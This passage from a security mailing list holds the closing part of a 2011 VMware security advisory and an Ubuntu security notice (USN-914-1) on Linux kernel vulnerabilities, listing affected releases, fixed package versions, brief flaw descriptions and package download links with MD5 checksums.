http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574


  1. Change log

2011-02-10 VMSA-2011-0003 Initial security advisory in conjunction with the release of vCenter Server 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1 Update 1, and ESX 4.1 Update 1 on 2011-02-10.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2011 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9 dxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX =2pVj -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . =========================================================== Ubuntu Security Notice USN-914-1 March 17, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2010-0307, CVE-2010-0309, CVE-2010-0410, CVE-2010-0415, CVE-2010-0622, CVE-2010-0623 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.83 linux-image-2.6.15-55-686 2.6.15-55.83 linux-image-2.6.15-55-amd64-generic 2.6.15-55.83 linux-image-2.6.15-55-amd64-k8 2.6.15-55.83 linux-image-2.6.15-55-amd64-server 2.6.15-55.83 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.83 linux-image-2.6.15-55-hppa32 2.6.15-55.83 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.83 linux-image-2.6.15-55-hppa64 2.6.15-55.83 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.83 linux-image-2.6.15-55-itanium 2.6.15-55.83 linux-image-2.6.15-55-itanium-smp 2.6.15-55.83 linux-image-2.6.15-55-k7 2.6.15-55.83 linux-image-2.6.15-55-mckinley 2.6.15-55.83 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.83 linux-image-2.6.15-55-powerpc 2.6.15-55.83 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.83 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.83 linux-image-2.6.15-55-server 2.6.15-55.83 linux-image-2.6.15-55-server-bigiron 2.6.15-55.83 linux-image-2.6.15-55-sparc64 2.6.15-55.83 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.83

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.68 linux-image-2.6.24-27-generic 2.6.24-27.68 linux-image-2.6.24-27-hppa32 2.6.24-27.68 linux-image-2.6.24-27-hppa64 2.6.24-27.68 linux-image-2.6.24-27-itanium 2.6.24-27.68 linux-image-2.6.24-27-lpia 2.6.24-27.68 linux-image-2.6.24-27-lpiacompat 2.6.24-27.68 linux-image-2.6.24-27-mckinley 2.6.24-27.68 linux-image-2.6.24-27-openvz 2.6.24-27.68 linux-image-2.6.24-27-powerpc 2.6.24-27.68 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.68 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.68 linux-image-2.6.24-27-rt 2.6.24-27.68 linux-image-2.6.24-27-server 2.6.24-27.68 linux-image-2.6.24-27-sparc64 2.6.24-27.68 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.68 linux-image-2.6.24-27-virtual 2.6.24-27.68 linux-image-2.6.24-27-xen 2.6.24-27.68

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.46 linux-image-2.6.27-17-server 2.6.27-17.46 linux-image-2.6.27-17-virtual 2.6.27-17.46

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.60 linux-image-2.6.28-18-imx51 2.6.28-18.60 linux-image-2.6.28-18-iop32x 2.6.28-18.60 linux-image-2.6.28-18-ixp4xx 2.6.28-18.60 linux-image-2.6.28-18-lpia 2.6.28-18.60 linux-image-2.6.28-18-server 2.6.28-18.60 linux-image-2.6.28-18-versatile 2.6.28-18.60 linux-image-2.6.28-18-virtual 2.6.28-18.60

Ubuntu 9.10: linux-image-2.6.31-109-imx51 2.6.31-109.25 linux-image-2.6.31-20-386 2.6.31-20.58 linux-image-2.6.31-20-generic 2.6.31-20.58 linux-image-2.6.31-20-generic-pae 2.6.31-20.58 linux-image-2.6.31-20-ia64 2.6.31-20.58 linux-image-2.6.31-20-lpia 2.6.31-20.58 linux-image-2.6.31-20-powerpc 2.6.31-20.58 linux-image-2.6.31-20-powerpc-smp 2.6.31-20.58 linux-image-2.6.31-20-powerpc64-smp 2.6.31-20.58 linux-image-2.6.31-20-server 2.6.31-20.58 linux-image-2.6.31-20-sparc64 2.6.31-20.58 linux-image-2.6.31-20-sparc64-smp 2.6.31-20.58 linux-image-2.6.31-20-virtual 2.6.31-20.58 linux-image-2.6.31-212-dove 2.6.31-212.26 linux-image-2.6.31-212-dove-z0 2.6.31-212.26 linux-image-2.6.31-305-ec2 2.6.31-305.13

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

Mathias Krause discovered that the Linux kernel did not correctly handle missing ELF interpreters. (CVE-2010-0307)

Marcelo Tosatti discovered that the Linux kernel's hardware virtualization did not correctly handle reading the /dev/port special device. (CVE-2010-0309)

Sebastian Krahmer discovered that the Linux kernel did not correctly handle netlink connector messages. (CVE-2010-0415)

Jermome Marchand and Mikael Pettersson discovered that the Linux kernel did not correctly handle certain futex operations. (CVE-2010-0622, CVE-2010-0623)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.diff.gz
  Size/MD5:  2954001 a76ac184052d21b4f80c0001be2958ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.dsc
  Size/MD5:     2439 35112e651762a697c560ad30f96d1199
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.83_all.deb
  Size/MD5:  5167438 2556995d77356b59ca8aeaf4a52fcc5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.83_all.deb
  Size/MD5:    96558 4aff0ca2bacb498944f8e6e2528109e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83_all.deb
  Size/MD5: 44746982 14122641ee51ed24ff6a086a8afbe3c8

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    22344 7823f908555a0edda63e17020e0a4441
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    44762 28c193429fab6d138eeb26a6f35612bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:     2312 e2403b081907b0b77fc1f2ee24c8b731
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    36294 256063685e2ad4c928266de1529abea1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   102358 de6d8ed61c2070d6b82fd43a3e9ee933
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    38890 0db32c114cbb7c332209bce75e137361
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    49154 fc382c582f2fada38021a45de1cb366d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   176620 cf6274ee632f10701fc34c70cecbc5c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    36770 ddc7734060d15267613bae0d471ccfc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   142350 5f923f40306467be653e98032668ba07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    51060 225a9c9e98e32327981c2595172d078e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   140708 034574e2bc1f265668ea546ab37653ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   287602 f5fbe6ea8cbd03ce421e0568eeaa7002
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    97832 e8be7fefc3deba54a661edf75d27f3f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:  1652140 a05d2f587d2ac7ddedc5e82e2bbdb27e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb
  Size/MD5:   872326 38dc5abd2d8ef8d535bd6c81eb28717c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb
  Size/MD5:   870656 6ae3197e5bd622a88d4bf674de768f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb
  Size/MD5:   870222 7f7e0f0efff6958167e0e7778f67a6ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb
  Size/MD5:   867844 15194cc40c8c7229b07d5565ab4e61b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_amd64.deb
  Size/MD5:  6925232 e6e09b4efc6ce644f0c10c2e5da63bd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb
  Size/MD5: 20818066 8f693fb75cb349914830ed42a8de8a9c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb
  Size/MD5: 20797294 35ff0e2a3045446635b4130ab7559414
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb
  Size/MD5: 21634748 7fc0676610bfd14ef55d29f10769b909
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb
  Size/MD5: 19904914 900e8fd3d1ae64c71952de3d31eca409
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    15626 43f3ac89b318c84e30514338a83520f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   240374 7e75e5e07c2a3d9423cd89f32ec17539
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   202662 107786bd43369769134130a40d9cb5e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:  1048612 62a414a37611feeb71b632af169acafd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:  1543636 198517172092a5f7440e69d144373f3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   161690 0d95184b543be1650381f149fe57d786
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:     9832 249ef56f732aebd34fa4bf81bbab677d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    80864 06ae57d637145be92c9fc40068e4740f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    49290 d7ab07f057fde183c79a6475e72cf0a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    35162 c61084c6e6feb8a3287b712b6c190f82
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    70894 5b3e430cfaf60278fc592f61734a56b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:     6220 8fd5aacf660001636ab53e4a7a4e6dcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:     9060 1ff11b1d1f18d0f5640fe82c07a65b03
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    57916 3a948b52edc5f51b4b9c6eca4a303959
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   123380 86e1e50fe5bc309c5aa66efe45be55b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   101078 dbf85d434072a7b5346aa01a978ac7d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    79276 99ca3dc97c5ac28bcddcd18f2a493836
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:  1595366 04da4748792d7c8cd012751b32e01a8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    72346 a59511cb29f600b503a5f5f3c6b4cadf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    12642 d04fa69b9992761d5e4bc0dee7a37ef8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    33806 5ba0205c7a15fdb347847635d1e543e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   138512 ee02cf55938734ac3fffe70f05873787
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:    38932 49dbd9c4e2e20c82bc4f72f96977fa76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb
  Size/MD5:   278866 0022570a60186a7507cc6fc0c2a70523

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    18976 36010ccdc2c317ea1c8709c5acdde882
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    43490 5ad83aebd2f0ac43a9d7cf5cfe8578f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   105216 cb23bc0ca0bac966260f0b2578d0fdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:     2284 8fa58a53434e18add295f31e34744f5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    34576 287fe266d7f5e52f9f20b316fae901b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    97046 bcc27695aa09eecab4c861d2e316001a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    37136 dad43b39afeea22f320027c2b569dadd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    44114 8414b8ea9d6e06f4266d04b9ef2d2976
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   167738 6d50d82ed633992aac2705d8dc00a8b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    33950 83316c8958735bc899e00a3e186c06d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   137966 f6e30ef9ea02fea6daf7ad82dbaa2511
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    46906 dbd091636aee1cceeddfa65bd6cc7fc9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   133162 8da4c9b8455249bc335da95c2cf8bbab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   273812 bbcb2b391def865054793f0e7e941bc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   102332 db46a2b60b21705f061be94e5d220689
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:  1597792 bd2e362f1f418b306ea21c41f61a141a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.83_i386.deb
  Size/MD5:   859548 86afec448f148903d5748747ee95fb09
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.83_i386.deb
  Size/MD5:   863906 bfe9f84581c53dd75a8f42722fac515c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.83_i386.deb
  Size/MD5:   859510 096d2cc6f0135932edcc5db3f697f7f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb
  Size/MD5:   863096 66788665458ea9d7627d4dbbaa7a492d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.83_i386.deb
  Size/MD5:   860094 2ec0549505550fe41b053a9d07b3e96d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_i386.deb
  Size/MD5:  6917930 6800b5b9cef3dda9c18285fd0a5a0861
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.83_i386.deb
  Size/MD5: 21723684 c77055baba2f8d0a0dca8c6b70efad7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.83_i386.deb
  Size/MD5: 22515514 803d268b74de5fb125afa60774aa6f45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.83_i386.deb
  Size/MD5: 22264222 89c3982ac0dbeb2a8c127cbba577b815
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb
  Size/MD5: 23626196 5778022e4579d673e07684c44bda3a08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.83_i386.deb
  Size/MD5: 23179348 1433bddfebc3d7ef9f00aedb14ebd3d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    15510 e62e57cfe09d188ebe01bc2ee45a845b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   238516 4a1995ef8bcfe107fc2e9b7465603dc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   197138 9dec44e8fdfc0abc95b95239b645fbec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:  1048388 fb0dad1c3a28730eaf12274f1c0dc7ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:  1741402 9377754754c4ed15a61342add3b761ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:   160894 989c116529f339cfbacefe427bcab857
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:     9166 bd634de0afad877e63a228b31ddfd455
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    76464 af2b674b8516d183a2af8348cf316321
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb
  Size/MD5:    53548 1fd06459bb056b1e6f3a124b409bbd0c
